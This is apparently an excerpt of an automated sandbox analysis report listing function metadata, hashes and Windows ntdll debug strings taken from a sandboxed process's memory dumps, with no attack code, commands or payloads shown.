                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 036B2C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2890947579.0000000003640000.00000040.00001000.00020000.00000000.sdmp, Offset: 03640000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2890947579.0000000003769000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2890947579.000000000376D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2890947579.00000000037DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_3640000_replace.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                        • Opcode ID: 29ddae7f0beaf59aeab341e7dcfa0510a021c0ed244527872dc7dafddc3ad840
                                                                                                                                        • Instruction ID: 66acf56e27cc8df686bcfc7594682e4418ba3b6e9a5ee96fa59000676e56da1e
                                                                                                                                        • Opcode Fuzzy Hash: 29ddae7f0beaf59aeab341e7dcfa0510a021c0ed244527872dc7dafddc3ad840
                                                                                                                                        • Instruction Fuzzy Hash: 37B02B318014C4C5DA10F76007087173A00A7C0301F19C061D2030341F0339C0C0E271
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Non-executed Functions

                                                                                                                                        Function 00E1210D Relevance: .0, Instructions: 16COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2889601685.0000000000E00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E00000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_e00000_replace.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: a0bd81cd7d61091ef07c710a33b5b7639ce3beb2f11083362372e60a029832cf
                                                                                                                                        • Instruction ID: 645cb1d6be8b446ff41c8f05d2703c48a464bf94ff7a875658a9fae8ba1ae3b5
                                                                                                                                        • Opcode Fuzzy Hash: a0bd81cd7d61091ef07c710a33b5b7639ce3beb2f11083362372e60a029832cf
                                                                                                                                        • Instruction Fuzzy Hash: 8DC08C13F6950A0011143CE938030B0F368D0830B9E4871BB9A08F7011640ACC1006C8
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 036B2890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2890947579.0000000003640000.00000040.00001000.00020000.00000000.sdmp, Offset: 03640000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2890947579.0000000003769000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2890947579.000000000376D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2890947579.00000000037DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_3640000_replace.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ___swprintf_l
                                                                                                                                        • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                                        • API String ID: 48624451-2108815105
                                                                                                                                        • Opcode ID: b1953af325950fb610d77ebc18d638faab752b1bf3baaffe328e1932ae66ecdf
                                                                                                                                        • Instruction ID: f84850d0c8bd38898f2d6c7c37c1bd63e8f993020296f3d730db279fa5332643
                                                                                                                                        • Opcode Fuzzy Hash: b1953af325950fb610d77ebc18d638faab752b1bf3baaffe328e1932ae66ecdf
                                                                                                                                        • Instruction Fuzzy Hash: 8C51E7B6B00256BFCB10DF99C9A09BEF7F8BB092407148669E469D7741D334DE848BE4
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 036A7630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Strings
                                                                                                                                        • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 036E46FC
                                                                                                                                        • Execute=1, xrefs: 036E4713
                                                                                                                                        • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 036E4742
                                                                                                                                        • CLIENT(ntdll): Processing section info %ws..., xrefs: 036E4787
                                                                                                                                        • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 036E4725
                                                                                                                                        • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 036E4655
                                                                                                                                        • ExecuteOptions, xrefs: 036E46A0
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2890947579.0000000003640000.00000040.00001000.00020000.00000000.sdmp, Offset: 03640000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2890947579.0000000003769000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2890947579.000000000376D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2890947579.00000000037DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_3640000_replace.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                                                        • API String ID: 0-484625025
                                                                                                                                        • Opcode ID: 7895a2b82a3361a94bdb85812896d9634dd82fc6073456ed985f458a005ce889
                                                                                                                                        • Instruction ID: 6dca3d750dccebeb757e7eb275b99b7e044e4dec4af5823dfb65b900a76d9927
                                                                                                                                        • Opcode Fuzzy Hash: 7895a2b82a3361a94bdb85812896d9634dd82fc6073456ed985f458a005ce889
                                                                                                                                        • Instruction Fuzzy Hash: A3512735A007196ADF21EBE9DC99BEE73B8EF05301F0400A9E505AB281EB71EE558F54
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 036BB5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2890947579.0000000003640000.00000040.00001000.00020000.00000000.sdmp, Offset: 03640000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2890947579.0000000003769000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2890947579.000000000376D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2890947579.00000000037DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_3640000_replace.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: __aulldvrm
                                                                                                                                        • String ID: +$-$0$0
                                                                                                                                        • API String ID: 1302938615-699404926
                                                                                                                                        • Opcode ID: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                                                                                                        • Instruction ID: 01b9ba83976f6916031a157bf4ac223293a8c62aaab34d8560377c4648e4ead2
                                                                                                                                        • Opcode Fuzzy Hash: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                                                                                                        • Instruction Fuzzy Hash: A181CD70E052599FDF28CE68C9957FEBBB2AF45310F1C426AD861A7391D63088D1CF54
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 0369F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Strings
                                                                                                                                        • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 036E02E7
                                                                                                                                        • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 036E02BD
                                                                                                                                        • RTL: Re-Waiting, xrefs: 036E031E
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2890947579.0000000003640000.00000040.00001000.00020000.00000000.sdmp, Offset: 03640000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2890947579.0000000003769000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2890947579.000000000376D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2890947579.00000000037DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_3640000_replace.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                                                                        • API String ID: 0-2474120054
                                                                                                                                        • Opcode ID: b158cc777d3a29c9a5c8fdd0c470f161d16112573de3eb28f52dec8c914fd965
                                                                                                                                        • Instruction ID: f04ea2a4681f3eadf6747c6c2d4c6307cef23755dd0eaae5009e058a9744d5b6
                                                                                                                                        • Opcode Fuzzy Hash: b158cc777d3a29c9a5c8fdd0c470f161d16112573de3eb28f52dec8c914fd965
                                                                                                                                        • Instruction Fuzzy Hash: 86E1AD346047419FEB24CF29C984B6AB7E8BB84314F190A6EE5A5CF3D1D7B4D849CB42
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 036ABED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Strings
                                                                                                                                        • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 036E7B7F
                                                                                                                                        • RTL: Resource at %p, xrefs: 036E7B8E
                                                                                                                                        • RTL: Re-Waiting, xrefs: 036E7BAC
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2890947579.0000000003640000.00000040.00001000.00020000.00000000.sdmp, Offset: 03640000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2890947579.0000000003769000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2890947579.000000000376D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2890947579.00000000037DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_3640000_replace.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                        • API String ID: 0-871070163
                                                                                                                                        • Opcode ID: f06449e46f21e67b581975478d153571e717a03cdcd7147fafccf6f6d6b23428
                                                                                                                                        • Instruction ID: ad16834774c9f8bde92deef8436b4dcd75532f5c0cd7a514428b1c7c0fdf567f
                                                                                                                                        • Opcode Fuzzy Hash: f06449e46f21e67b581975478d153571e717a03cdcd7147fafccf6f6d6b23428
                                                                                                                                        • Instruction Fuzzy Hash: 9A41E035301B029FC724CE29C940B6AB7E5EF88720F080A2DF95A9B780DB71E8058F95
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 036AB4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 036E728C
                                                                                                                                        Strings
                                                                                                                                        • RTL: Resource at %p, xrefs: 036E72A3
                                                                                                                                        • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 036E7294
                                                                                                                                        • RTL: Re-Waiting, xrefs: 036E72C1
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2890947579.0000000003640000.00000040.00001000.00020000.00000000.sdmp, Offset: 03640000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2890947579.0000000003769000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2890947579.000000000376D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2890947579.00000000037DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_3640000_replace.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                        • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                        • API String ID: 885266447-605551621
                                                                                                                                        • Opcode ID: 30da21251c10f746eb1935a41d40aff5ce7d7e82b22d6b91f95cc7eeca67d9fb
                                                                                                                                        • Instruction ID: da31a4e02378e6ffcb02680f002bb78d8322d139744713f6c511e6708eb2a7f9
                                                                                                                                        • Opcode Fuzzy Hash: 30da21251c10f746eb1935a41d40aff5ce7d7e82b22d6b91f95cc7eeca67d9fb
                                                                                                                                        • Instruction Fuzzy Hash: 28410E35701706AFC720DE28CD41B6ABBA5FF84710F180629F955EB380DB21F8469BE9
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 036B7D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2890947579.0000000003640000.00000040.00001000.00020000.00000000.sdmp, Offset: 03640000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2890947579.0000000003769000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2890947579.000000000376D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2890947579.00000000037DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_3640000_replace.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: __aulldvrm
                                                                                                                                        • String ID: +$-
                                                                                                                                        • API String ID: 1302938615-2137968064
                                                                                                                                        • Opcode ID: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                                                                                                        • Instruction ID: 44caaf9b3a7c3e1c9d5147f8265fc8d76a4864476886b4db16b060caa93d8d6a
                                                                                                                                        • Opcode Fuzzy Hash: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                                                                                                        • Instruction Fuzzy Hash: DE916070E0021A9BDB24DE69C9816FEB7B9AF84760F18455AE865EB3C0D73099C1CF54
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 03679126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2890947579.0000000003640000.00000040.00001000.00020000.00000000.sdmp, Offset: 03640000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2890947579.0000000003769000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2890947579.000000000376D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2890947579.00000000037DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_3640000_replace.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: $$@
                                                                                                                                        • API String ID: 0-1194432280
                                                                                                                                        • Opcode ID: a8e4dbaffcff7722f9a31b1f386b41ec72fcbf8f5d26b0f067ecca3fe72a24d0
                                                                                                                                        • Instruction ID: b2c368e321d650f3db9d5385827e553c9f8ec1ce6eb59227c39241423b234f6c
                                                                                                                                        • Opcode Fuzzy Hash: a8e4dbaffcff7722f9a31b1f386b41ec72fcbf8f5d26b0f067ecca3fe72a24d0
                                                                                                                                        • Instruction Fuzzy Hash: 48813975D002699BDB31DB54CD54BEEBBB8AB08710F1445EAE919B7280E7309E81CFA4
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%